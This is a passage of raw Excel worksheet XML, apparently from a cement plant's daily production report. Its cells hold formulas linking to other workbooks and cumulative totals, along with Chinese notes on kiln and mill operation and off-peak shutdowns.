        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]9'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'8'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]9'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]9'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]9'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'8'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]9'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'8'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]9'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]9'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]9'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]9'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'8'!U42</f>
        <v>2592.9</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210179.87</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]9'!$V$8</f>
        <v>836</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'8'!X42</f>
        <v>4546</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>207017</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]9'!$Y$8</f>
        <v>6525.736</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]9'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]9'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'8'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]9'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'8'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]9'!$L$14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'[12]9'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'8'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]9'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'8'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]9'!$L$15</f>
        <v>65896.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]9'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]9'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]9'!$R$29</f>
        <v>1320.16</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'8'!U44</f>
        <v>2689</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>67442.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]9'!$V$29</f>
        <v>223</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'8'!X44</f>
        <v>1458</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>67868</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]9'!$Y$29</f>
        <v>3530.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]9'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'8'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]9'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'8'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]9'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]9'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]9'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]9'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]9'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]9'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]9'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]9'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]9'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'8'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'8'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]9'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]9'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]9'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'8'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]9'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'8'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]9'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'8'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'8'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]9'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]9'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]9'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'8'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]9'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'8'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]9'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'8'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'8'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]9'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]9'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]9'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'8'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]9'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'8'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]9'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'8'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'8'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]9'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]9'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]9'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'8'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]9'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'8'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]9'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'8'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'8'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]9'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]9'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]9'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'8'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]9'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'8'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]9'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]9'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]9'!$E$24</f>
        <v>4803</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'8'!H51</f>
        <v>50160.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1426559.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]9'!$I$24</f>
        <v>4832.573</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'8'!K51</f>
        <v>45940.269</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1409064.2</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]9'!$L$24</f>
        <v>52919.4149999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>117.5987</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]9'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]9'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]9'!$R$30</f>
        <v>240.07</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'8'!U51</f>
        <v>2407.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>65406.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]9'!$V$30</f>
        <v>196</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'8'!X51</f>
        <v>2116.638</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>62732.875</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]9'!$Y$30</f>
        <v>3542.65600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]9'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]9'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'8'!H52</f>
        <v>1.8e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]9'!$I$19</f>
        <v>5210.013</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'8'!K52</f>
        <v>50144.541</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1331838.741</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]9'!$L$19</f>
        <v>54901.9020000504</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>37.8633806896899</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'[13]9'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]9'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'8'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]9'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'8'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]9'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]9'!$M$21+'[14]9'!$M$22+'[14]9'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]9'!$N$21+'[14]9'!$N$22+'[14]9'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'8'!U53</f>
        <v>425.67</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38760.097</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]9'!$Q$21+'[14]9'!$Q$22+'[14]9'!$Q$35</f>
        <v>48</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'8'!X53</f>
        <v>505</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39996</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]9'!$T$21+'[14]9'!$T$22+'[14]9'!$T$35</f>
        <v>1569.617</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]9'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'8'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]9'!$I$47</f>
        <v>1469.963</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'8'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]9'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]9'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]9'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]9'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'8'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]9'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'8'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]9'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]9'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'8'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]9'!$I$63</f>
        <v>148.95</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'8'!K55</f>
        <v>1490.016</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36925.666</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]9'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]9'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]9'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]9'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]9'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]9'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]9'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]9'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]9'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'8'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'8'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]9'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：9:20-22:10避峰停机；3#磨：大修续停；4#磨：9:20-22:10避峰停机。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G57+'8'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'8'!K57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G58+'8'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'8'!K58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G59+'8'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'8'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]9'!$Q$65</f>
        <v>窑:正常。A组磨：8:00-18:05避峰停机。D1#磨：正常，D2#磨：正常。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G60+'8'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'8'!K60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'[14]9'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]9'!$E$6</f>
        <v>2616</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'8'!H61</f>
        <v>32771</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1148644</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]9'!$E$21</f>
        <v>4057.67</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'8'!K61</f>
        <v>34779.18</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1135939.26</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]9'!$H$6</f>
        <v>35760.9899999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>68.7711346153844</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'[14]9'!$M$11+'[14]9'!$M$12+'[14]9'!$M$13+'[14]9'!$M$14+'[14]9'!$M$15+'[14]9'!$M$16+'[14]9'!$M$17+'[14]9'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]9'!$N$11+'[14]9'!$N$12+'[14]9'!$N$13+'[14]9'!$N$14+'[14]9'!$N$15+'[14]9'!$N$16+'[14]9'!$N$17+'[14]9'!$N$18</f>
        <v>2680</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'8'!H62</f>
        <v>20703</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>856696.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]9'!$Q$11+'[14]9'!$Q$12+'[14]9'!$Q$13+'[14]9'!$Q$14+'[14]9'!$Q$15+'[14]9'!$Q$16+'[14]9'!$Q$17+'[14]9'!$Q$18</f>
        <v>2014</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'8'!K62</f>
        <v>23344</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>857816.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]9'!$T$11+'[14]9'!$T$12+'[14]9'!$T$13+'[14]9'!$T$14+'[14]9'!$T$15+'[14]9'!$T$16+'[14]9'!$T$17+'[14]9'!$T$18</f>
        <v>15813.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>63.2545359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]9'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
